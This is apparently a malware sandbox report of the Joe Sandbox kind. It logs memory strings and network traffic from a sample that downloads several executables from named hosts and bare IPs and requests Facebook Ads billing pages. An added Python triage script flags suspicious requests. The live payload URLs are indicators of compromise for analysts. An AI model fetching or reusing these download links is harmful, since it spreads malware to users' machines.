Source: explorer.exe, 00000001.00000000.359830195.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.347268530.000000000ED27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.388576135.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.317714700.000000000091F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: ECFD.exe, 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://www.openssl.org/support/faq.html
Source: ECFD.exe, 00000009.00000002.615541092.000000000071A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/
Source: ECFD.exe, 00000009.00000002.608052687.00000000006D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json
Source: ECFD.exe, 00000009.00000002.608052687.00000000006D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json)d
Source: ECFD.exe, 00000009.00000002.608052687.00000000006D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json5d
Source: ECFD.exe, 00000009.00000002.608052687.00000000006D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsons
Source: 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://messenger.com/
Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/y0/l/0
Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/y5/l/0
Source: 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yC/r/jQFlt4gyp9R.js?_nc_x=Ij3Wp8lg5Kz
Source: 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yH/l/0
Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yH/r/xXDOO3oMCfl.js?_nc_x=Ij3Wp8lg5Kz
Source: 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yL/l/0
Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/pslzeMSEB_a.js?_nc_x=Ij3Wp8lg5Kz
Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yS/r/V_wJ8EQu-vo.js?_nc_x=Ij3Wp8lg5Kz
Source: 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yS/r/nHDYRDL5JAA.js?_nc_x=Ij3Wp8lg5Kz
Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yV/l/0
Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yV/r/tuAGtaeF5Lw.js?_nc_x=Ij3Wp8lg5Kz
Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.565334783.0000000000809000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yW/l/0
Source: 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yg/r/l_dEElJiBCo.js?_nc_x=Ij3Wp8lg5Kz
Source: 2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yh/l/0
Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/0
Source: 2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yj/r/w8iOGQ_Hw3c.js?_nc_x=Ij3Wp8lg5Kz
Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.565334783.0000000000809000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yr/l/0
Source: 2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yu/r/G76sQY80s37.js?_nc_x=Ij3Wp8lg5Kz
Source: 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yv/r/GG1Y0sYc7My.js?_nc_x=Ij3Wp8lg5Kz
Source: 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yy/l/0
Source: 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3i7M54/yK/l/en_US/7XFrsMZamvv.js?_nc_x=Ij3Wp8lg5Kz
Source: 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico
Source: 2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: https://www.facebook.
Source: unknown DNS traffic detected: queries for: furubujjul.net
Source: global traffic HTTP traffic detected: GET /files/pe/pb1113.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: kkh.eiwagggg.com
Source: global traffic HTTP traffic detected: GET /upload/ChromeSetup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: pelegisr.com
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /22.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.rukangiralawchambers.org
Source: global traffic HTTP traffic detected: GET /testermanmag/myownre/raw/main/explorer.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
Source: global traffic HTTP traffic detected: GET /jamesp.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: keziheritier.com
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /7.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: keziheritier.com
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /s.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.138.74.52
Source: global traffic HTTP traffic detected: GET /intersock.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 179.43.163.115
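The request lines above are the IOCs of the download chain, but the text export runs each request's headers together on one line. The following Python is an added example, not part of the Joe Sandbox report: it splits such a line back into request line and headers and flags what an analyst would pull out of it: PE downloads, bare-IP hosts, the Internet Explorer 11 user-agent string (which urlmon/WinINet download code also presents, so the originating process, not the string alone, decides whether a browser sent it; this reading is a heuristic), and the malformed Accept-Language value ("en,q=0.9;q=0.8,...") carried by the facebook.com requests, which a genuine Chrome build does not emit and which makes a usable fingerprint. The sample lines are copied from this section (the facebook.com one trimmed to the headers that matter); the header list, the "Trident/7.0" marker and the flag wording are the example's own choices.

```python
import re
from ipaddress import ip_address

# Header names seen in this report's request lines. The text export runs the
# headers together with no separator, so we split on a lookahead for "Name: ".
# Assumption of this example: the list is complete for the lines it is fed.
HEADER_NAMES = [
    "Connection", "User-Agent", "Host", "Accept", "Accept-Language",
    "viewport-width", "sec-ch-ua", "sec-ch-ua-mobile", "sec-ch-ua-platform",
    "sec-ch-prefers-color-scheme", "Upgrade-Insecure-Requests",
    "Sec-Fetch-Site", "Sec-Fetch-Mode", "Sec-Fetch-User", "Sec-Fetch-Dest",
]
_HEADER_SPLIT = re.compile(r"(?=(?:%s): )" % "|".join(map(re.escape, HEADER_NAMES)))
_REQUEST_LINE = re.compile(
    r"^(?:Source: .*?HTTP traffic detected: )?"
    r"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/1\.[01](?P<rest>.*)$")
# One RFC 7231 language range per comma-separated element, e.g. "en", "en-US;q=0.8", "*".
_LANG_RANGE = re.compile(
    r"^(?:\*|[A-Za-z]{1,8}(?:-[A-Za-z0-9]{1,8})*)(?:;q=(?:0(?:\.\d{0,3})?|1(?:\.0{0,3})?))?$")
IE11_UA_MARKER = "Trident/7.0"   # heuristic marker, this example's choice

# Constructed sample input: three request lines copied from this section, the
# facebook.com one trimmed to the headers the checks below look at.
SAMPLE_LINES = [
    "Source: global traffic HTTP traffic detected: GET /testermanmag/myownre/raw/main/explorer.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com",
    "Source: global traffic HTTP traffic detected: GET /s.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.138.74.52",
    "Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Sec-Fetch-Dest: document",
]


def parse_request(line: str) -> dict:
    """Split one fused 'GET /x HTTP/1.1Header: v...' report line into its parts."""
    m = _REQUEST_LINE.match(line.strip())
    if not m:
        raise ValueError("not an HTTP request line: %r" % line[:60])
    headers = {}
    for chunk in _HEADER_SPLIT.split(m.group("rest")):
        if not chunk:                      # zero-width split leaves an empty lead element
            continue
        name, _, value = chunk.partition(": ")
        headers[name] = value
    return {"method": m.group("method"), "path": m.group("path"), "headers": headers}


def _is_ip(host: str) -> bool:
    try:
        ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False


def request_url(req: dict) -> str:
    """Rebuild the plain-HTTP URL the sandbox saw (these requests were not TLS)."""
    return "http://%s%s" % (req["headers"].get("Host", ""), req["path"])


def flag_request(req: dict) -> list:
    """Return the reasons this request deserves analyst attention (may be empty)."""
    headers, path = req["headers"], req["path"]
    host = headers.get("Host", "")
    ua = headers.get("User-Agent", "")
    reasons = []
    if path.lower().rsplit("?", 1)[0].endswith((".exe", ".dll")):
        reasons.append("downloads a PE file: %s" % path)
    if _is_ip(host):
        reasons.append("host is a bare IP address: %s" % host)
    if IE11_UA_MARKER in ua:
        reasons.append("IE11 user-agent string (also what urlmon/WinINet download code "
                       "presents; check which process made the request)")
    lang = headers.get("Accept-Language")
    if lang is not None and not all(_LANG_RANGE.match(r.strip()) for r in lang.split(",")):
        reasons.append("malformed Accept-Language header: %s..." % lang[:24])
    return reasons


def triage(lines) -> list:
    """Pair each request's URL with the reasons it was flagged."""
    out = []
    for line in lines:
        req = parse_request(line)
        out.append((request_url(req), flag_request(req)))
    return out


if __name__ == "__main__":
    for url, reasons in triage(SAMPLE_LINES):
        print(url)
        for reason in reasons:
            print("   -", reason)
```

The split-on-lookahead trick only works because each header name is followed by ": " and no header value in these lines contains such a sequence; feed it lines with other headers and extend HEADER_NAMES first, or the unknown header is glued onto the previous value.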
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Thu, 13 Oct 2022 11:08:05 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-originExpect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hbAwJXDRzKYgO3xdYMEmowmTM2idYU9Liu8hsb0MCvcFgfhyvV2XhGRmTUzxe2HnCnNzA9WhmvmuzEKBFqL7PZJQ%2Fzuq7jWpwivO1cF4i2%2FareHc5B02a%2F%2FS1gbJpcjLZA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c476a79775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 38 33 30 0d 0a 19 00 00 00 1f 3d 5a e6 71 20 3c 60 7e 45 e7 de bd d8 f7 26 6f 18 c8 43 85 0c 8a ae 57 00 37 cc 03 00 34 6f 8a 38 01 00 00 00 02 00 9e 03 00 00 73 d2 09 b6 c9 de db c5 ba 1e d7 7f 00 12 17 00 23 c9 75 21 7d 31 a2 02 6b a5 2d 41 ec 51 18 fa f8 e1 fc b7 d5 59 5e d9 fc 05 8a e6 2e b0 b3 25 e5 ea a7 6b bf aa d2 2a a1 30 2e 91 f4 d1 8f ea 9f c6 25 9c c5 89 09 cb 73 4a b2 26 d8 20 90 41 44 69 cf 7e 2f 45 4f d8 13 77 10 87 39 b4 bf 0f f7 e9 19 82 a7 10 b1 d7 19 1a 19 6a 33 fc 4e ec 20 86 9f cf 03 46 7d f0 e6 e5 4f a4 db 03 b4 3f dc 6e 62 a8 cf d0 14 a1 8b 5a 40 bb 9c 22 79 f8 02 92 87 b6 85 0e 2a 26 b7 a0 50 44 13 d1 ad da 68 6b 16 86 cc 76 b9 cc c2 8b e1 c5 1a 29 ca ae 93 ea 2a 85 ed cb d3 f5 00 0b 8c 84 9b 73 73 ac 0e 89 cf 08 3b 19 e1 d1 18 0b 83 49 65 d5 bc a8 fb f8 75 ea 73 e5 36 e7 89 9e bc fc e0 93 9f 0e 30 e3 b1 93 95 97 a7 51 6e c6 76 98 34 61 81 b9 d4 29 1e 0b 48 34 51 ea a8 27 bd a7 d3 19 7b ba fb 14 37 89 40 35 c9 72 ce ff 7e 73 02 80 1d 34 a3 d6 d5 35 54 16 c0 8c 0b b9 9c 39 cc 5a 58 e4 72 4a e6 3d ac 59 3b f2 1d 17 db 53 f1 f9 f8 6d 3c cd 87 c5 4c 80 7e b9 38 2b 2b 80 c9 45 28 26 8c 39 c1 e6 f7 06 d2 9f 3e 54 78 a5 8f 04 e0 44 d8 60 ef b0 31 16 26 48 3c be 6d 48 19 5f 48 77 e4 60 01 bd 87 b0 1c 9d a1 16 f4 36 d8 35 bf ff c2 92 ea 11 27 67 98 42 42 9d 33 db ad c4 a3 26 8a 4b 66 21 d8 e8 f5 cb c5 74 47 a9 b2 
